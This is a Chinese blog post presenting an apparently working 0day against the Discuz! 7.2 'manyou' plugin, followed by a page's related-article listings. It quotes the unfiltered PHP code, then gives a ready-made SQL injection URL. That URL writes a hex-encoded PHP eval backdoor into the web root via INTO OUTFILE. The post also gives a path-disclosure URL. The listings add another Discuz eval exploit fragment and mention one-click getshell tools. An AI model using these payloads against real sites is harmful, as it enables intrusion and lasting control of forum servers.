discuz! 7.2 manyou插件暴路径&Get Webshell 0day

最新推荐文章于 2024-09-22 11:17:00 发布
最新推荐文章于 2024-09-22 11:17:00 发布
阅读量1k 收藏
点赞数
分类专栏: 网络安全技术 文章标签: null delete query action 数据库 file
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/linkboy2004/article/details/5454655
版权

在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。

漏洞分析:
文件./manyou/sources/notice.php

相关代码:

if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']);    //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {  
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}

很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23


/manyou/admincp.php?my_suffix=%0A%0DTOBY57    爆路径

 

linkboy2004
关注
专栏目录
discuz7.2注入漏洞faq.php
01-08
复现discuz7.2注入漏洞
7.2 discuzshell_DZ 7.2 漏洞 - Discuz!-BUG与问题交流 - Discuz! 官方站 - Powered by Discuz!...
weixin_39748928的博客
12-22 363
我网站 最近老被入侵就在网上 查了查 不知道官网 我转了2个 入侵方法 过来 请 官网管理 和各位高手 看看该怎么预防/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径然后直接getshelluserapp.php?script=notice&view=all&option=deluserapp&action=invite&am...
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
Discuz 7.2漏洞入侵图解
kuxing100的专栏
05-06 4427
Discuz 7.2漏洞入侵图解 找到一个论坛,注册一个账号 注册好后,使用exp 复制以下代码: http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(11
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
shopex 4.8.5 webshell 0day
05-23
shopex 4.8.5 webshell 0day
价值500元拿webshell0day.rar
08-01
本文将深入探讨“价值500元拿webshell0day.rar”这个压缩包所涉及的知识点,包括Webshell的原理、0day漏洞的概念以及相关工具的使用。 首先,Webshell是攻击者在成功入侵网站后,为了长期控制和管理被黑服务器而...
基于爬虫开发webshell爆破插件与备份扫描插件-代码.rar
04-10
本项目涉及的是利用爬虫技术开发针对Webshell的爆破插件以及备份扫描插件,旨在提升网站安全防护能力。下面将详细介绍这两个概念及其相关知识点。 **Webshell** Webshell,也被称为网站后门,是一种通过SQL注入、...
虚拟主机封杀webshell提权!!!!!!!!!!
10-01
### 虚拟主机安全加固:封杀WebShell与提权威胁 在当前网络环境中,虚拟主机的安全性显得尤为重要。本文将围绕“虚拟主机封杀WebShell提权”这一主题展开,详细介绍如何在Windows虚拟主机环境下,特别是针对ASP + ...
基于爬虫开发webshell爆破插件与备份扫描插件.pdf
08-20
在这份文档中,主要介绍的是如何基于爬虫技术开发webshell爆破插件和备份扫描插件。接下来,我们将深入探讨文档中涉及的各个知识点。 首先,文档提到了webshell的概念。Webshell是指运行在Web服务器上的后门程序,...
Discuz! 7.2以下版本及各uc产品api接口Get webshell漏洞
weixin_33971205的博客
11-01 111
http://evilcoda.com/archives/367.html http://www.oldjun.com/blog/index.php/archives/76/ http://www.oldjun.com/blog/index.php/archives/59/ 转载于:https://blog.51cto.com/obnus/413737...
Dz7.2 从获取uc key到getshell
weixin_30256901的博客
01-23 362
0x01下午在群里看到的 问下朋友大概 然后用不生不熟的sqlmap在那跑–表能跑的出 列就GG了 然后没辙–晚上跑各大论坛逛了遍果然大神多 就慢慢的研究下了下 看了pt0n大牛的分析文 真心感叹这洞 呵呵-。- 0x02获取uc key exp: faq.php?action=grouppermission&gids[99]='&amp...
discuz7.2sql注入漏洞
weixin_40709439的博客
09-20 8405
今天尝试了discuz7.2动力论坛的sql注入漏洞 原因是由faq.php文件源码存在漏洞引起的 下载官方discuz7.2源码,在本地搭建漏洞环境 http://www.comsenz.com/downloads/install/discuz 下载的三个文件 利用http://localhost:8088/discuz72/upload/install/index.php进行安装...
Discuz7.2漏洞
whrjxyygx的专栏
01-13 5075
发布日期:2010-01-06更新日期:2010-01-07受影响系统:Discuz! Discuz! 7.1Discuz! Discuz! 7.2描述:Discuz!是一款华人地区非常流行的Web论坛程序。Discuz!的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。以下是有漏洞代码段:function showmessage
Discuz 7.2 faq.php漏洞分析
weixin_30421525的博客
08-20 120
漏洞发生在页面faq.php中,源码如下: elseif($action == 'grouppermission') {ksort($gids); $groupids = array(); foreach($gids as $row) { $groupids[] = $row[0]; } $query = $db->que...
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
最新发布
程序员阿龙的博客
09-22 3268
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Redis的Key的过期策略是怎样实现的?
daydayup
09-19 695
在学习Redis时,我们知道可以设置Key的过期时间,我们还知道,Redis一大特点–。那么当Redis中的数据量起来时,如果直接遍历所有的Key,那么对于Key过期时间的校验应该很费时间,那么Redis究竟是怎样做的呢?本文就来探讨关于Redis中的Key的过期册策略。Redis中的过期策略有两种。
MySQL数据库的增删改查以及基本操作分享
m0_57094953的博客
09-21 367
MySQL数据库基本操作分享,包括增删改查,登录退出,查看数据库、表等
Discuz! 6.0-7.0后台Webshell漏洞利用教程
论坛软件不同版本(如2011年及其之前,包括6.0和7.0)的后台获取Webshell漏洞利用技术。Discuz!是一个流行的PHP论坛系统,其安全漏洞常常成为攻击者的目标。文章的核心焦点在于利用Discuz!扩展插件中的漏洞进行文件...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值